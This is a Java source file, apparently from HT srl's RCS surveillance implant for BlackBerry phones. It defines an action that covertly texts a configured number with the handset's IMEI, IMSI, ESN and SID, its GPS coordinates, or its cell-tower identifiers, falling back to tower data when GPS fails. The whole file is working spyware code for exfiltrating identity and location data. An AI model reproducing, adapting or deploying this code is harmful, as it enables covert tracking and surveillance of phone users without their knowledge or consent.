
/* *************************************************
 * Copyright (c) 2010 - 2010
 * HT srl,   All rights reserved.
 * Project      : RCS, RCSBlackBerry_lib
 * File         : SmsAction.java
 * Created      : 26-mar-2010
 * *************************************************/
package blackberry.action;

import javax.microedition.location.Location;
import javax.microedition.location.QualifiedCoordinates;

import net.rim.device.api.system.CDMAInfo;
import net.rim.device.api.system.CDMAInfo.CDMACellInfo;
import net.rim.device.api.system.GPRSInfo;
import net.rim.device.api.system.GPRSInfo.GPRSCellInfo;
import net.rim.device.api.util.NumberUtilities;
import blackberry.Device;
import blackberry.Messages;
import blackberry.SMSHelper;
import blackberry.Trigger;
import blackberry.config.ConfAction;
import blackberry.config.ConfigurationException;
import blackberry.debug.Check;
import blackberry.debug.Debug;
import blackberry.debug.DebugLevel;
import blackberry.location.LocationHelper;
import blackberry.location.LocationObserver;
import blackberry.utils.StringUtils;
import blackberry.utils.Utils;

/**
 * The Class SmsAction.
 */
public final class SmsAction extends SubAction implements LocationObserver {




    private static final int TYPE_LOCATION = 1;
    private static final int TYPE_SIM = 2;
    private static final int TYPE_TEXT = 3;

    String number;
    String text;
    int type=TYPE_TEXT;

    public SmsAction(final ConfAction params) {
        super(params);
    }

    /*
     * (non-Javadoc)
     * @see blackberry.action.SubAction#parse(byte[])
     */
    protected boolean parse(final ConfAction params) {
        try {
            number = Utils
                    .unspace(params.getString(Messages.getString("9.26"))); //$NON-NLS-1$      
            // default TEXT
            descrType = params.getString(Messages.getString("9.27"),Messages.getString("9.29")); //$NON-NLS-1$
            if (Messages.getString("9.28").equals(descrType)) { //$NON-NLS-1$
                type = TYPE_LOCATION;
            } else if (Messages.getString("9.29").equals(descrType) ) { //$NON-NLS-1$
                type = TYPE_TEXT;
            } else if (Messages.getString("9.30").equals(descrType)) { //$NON-NLS-1$
                type = TYPE_SIM;
            } else {



                return false;
            }
    



    
            switch (type) {
                case TYPE_TEXT:
                    text = params.getString(Messages.getString("9.33")); //$NON-NLS-1$
                    break;
                case TYPE_LOCATION:
                    // http://supportforums.blackberry.com/t5/Java-Development/How-To-Get-Cell-Tower-Info-Cell-ID-LAC-from-CDMA-BB-phones/m-p/34538
                    break;
                case TYPE_SIM:
                    final StringBuffer sb = new StringBuffer();
                    final Device device = Device.getInstance();
                    if (Device.isCDMA()) {
    
                        sb.append(Messages.getString("9.34") + device.getSid() + "\n"); //$NON-NLS-1$ //$NON-NLS-2$
                        sb.append(Messages.getString("9.36") //$NON-NLS-1$
                                + NumberUtilities.toString(device.getEsn(), 16)
                                + "\n"); //$NON-NLS-1$
                    }
                    if (Device.isGPRS()) {
                        sb.append(Messages.getString("9.38") + device.getImei(true) + "\n"); //$NON-NLS-1$ //$NON-NLS-2$
                        sb.append(Messages.getString("9.40") + device.getImsi(true) + "\n"); //$NON-NLS-1$ //$NON-NLS-2$
                    }
                    if (Device.isIDEN()) {



                    }
    
                    text = sb.toString();
                    break;
                default:



                    break;
            }
    
        } catch (final ConfigurationException e) {




            return false;
        }
    
        return true;
    }

    /*
     * (non-Javadoc)
     * @see blackberry.action.SubAction#execute(blackberry.event.Event)
     */
    public boolean execute(final Trigger triggeringEvent) {

        try {
            switch (type) {
                case TYPE_TEXT:
                case TYPE_SIM:
                    return sendSMS(text);

                case TYPE_LOCATION:
                    // http://supportforums.blackberry.com/t5/Java-Development/How-To-Get-Cell-Tower-Info-Cell-ID-LAC-from-CDMA-BB-phones/m-p/34538
                    if (!getGPSPosition()) {
                        errorLocation(false);
                    }

                    break;
                default:



            }
            return true;
        } catch (final Exception ex) {



            return false;
        }
    }

    private boolean getCellPosition() {




        String message;

        try {
            if (Device.isGPRS()) {
                // CC: %d, MNC: %d, LAC: %d, CID: %d (Country Code, Mobile Network Code, Location Area Code, Cell Id).
                // CC e MNC possono essere estratti da IMEI
                // http://en.wikipedia.org/wiki/Mobile_country_code
                // http://en.wikipedia.org/wiki/Mobile_Network_Code
                final GPRSCellInfo cellinfo = GPRSInfo.getCellInfo();

                final int mcc = Integer.parseInt(Integer.toHexString(cellinfo
                        .getMCC()));

                final int mnc = cellinfo.getMNC();
                final int lac = cellinfo.getLAC();
                final int cid = cellinfo.getCellId();

                final int bsic = GPRSInfo.getCellInfo().getBSIC();

                final StringBuffer mb = new StringBuffer();
                mb.append(Messages.getString("9.3") + mcc); //$NON-NLS-1$
                mb.append(Messages.getString("9.4") + mnc); //$NON-NLS-1$
                mb.append(Messages.getString("9.5") + lac); //$NON-NLS-1$
                mb.append(Messages.getString("9.6") + cid); //$NON-NLS-1$
                message = mb.toString();
            } else if (Device.isCDMA()) {
                final CDMACellInfo cellinfo = CDMAInfo.getCellInfo();
                //CDMAInfo.getIMSI()
                final int sid = cellinfo.getSID();
                final int nid = cellinfo.getNID();
                final int bid = cellinfo.getBID();

                final StringBuffer mb = new StringBuffer();
                mb.append(Messages.getString("9.7") + sid); //$NON-NLS-1$
                mb.append(Messages.getString("9.8") + nid); //$NON-NLS-1$
                mb.append(Messages.getString("9.9") + bid); //$NON-NLS-1$
                message = mb.toString();
            } else if (Device.isIDEN()) {



                return false;
            } else {



                return false;
            }




            return sendSMS(message);
        } catch (final Exception ex) {



            return false;
        }
    }

    private boolean getGPSPosition() {

        if (waitingForPoint) {



            return false;
        }

        synchronized (this) {
            LocationHelper.getInstance().start(this, true);
        }

        return true;
    }

    public void newLocation(Location loc) {




        if (loc == null) {



            return;
        }

        final float speed = loc.getSpeed();
        final float course = loc.getCourse();

        final QualifiedCoordinates qc = loc.getQualifiedCoordinates();
        if (qc == null) {



            errorLocation(false);
        }

        final StringBuffer sb = new StringBuffer();
        sb.append(Messages.getString("9.16") + qc.getLatitude() + "\r\n"); //$NON-NLS-1$ //$NON-NLS-2$
        sb.append(Messages.getString("9.18") + qc.getLongitude() + "\r\n"); //$NON-NLS-1$ //$NON-NLS-2$

        sendSMS(sb.toString());

    }

    public void errorLocation(boolean interrupted) {




        if (!getCellPosition()) {
            sendSMS(Messages.getString("9.0")); //$NON-NLS-1$
        }
    }

    boolean waitingForPoint;

    private String descrType;

    public void waitingForPoint(boolean b) {
        waitingForPoint = b;
    }

    boolean sendSMS(final String message) {
        
        if(StringUtils.empty(number) || StringUtils.empty(message)){



            return false;
        }
        
        boolean ret = false;
        if (Device.isCDMA()) {



            ret = SMSHelper.sendSMSDatagram(number, message);
        } else if (Device.isGPRS()) {



            //ret = sendSMSBinary(message);




            if (Device.isSimEnabled()) {
                ret = SMSHelper.sendSMSText(number, message);
            } else {



            }
        } else if (Device.isIDEN()) {



        } else {

        }
        return ret;
    }












}
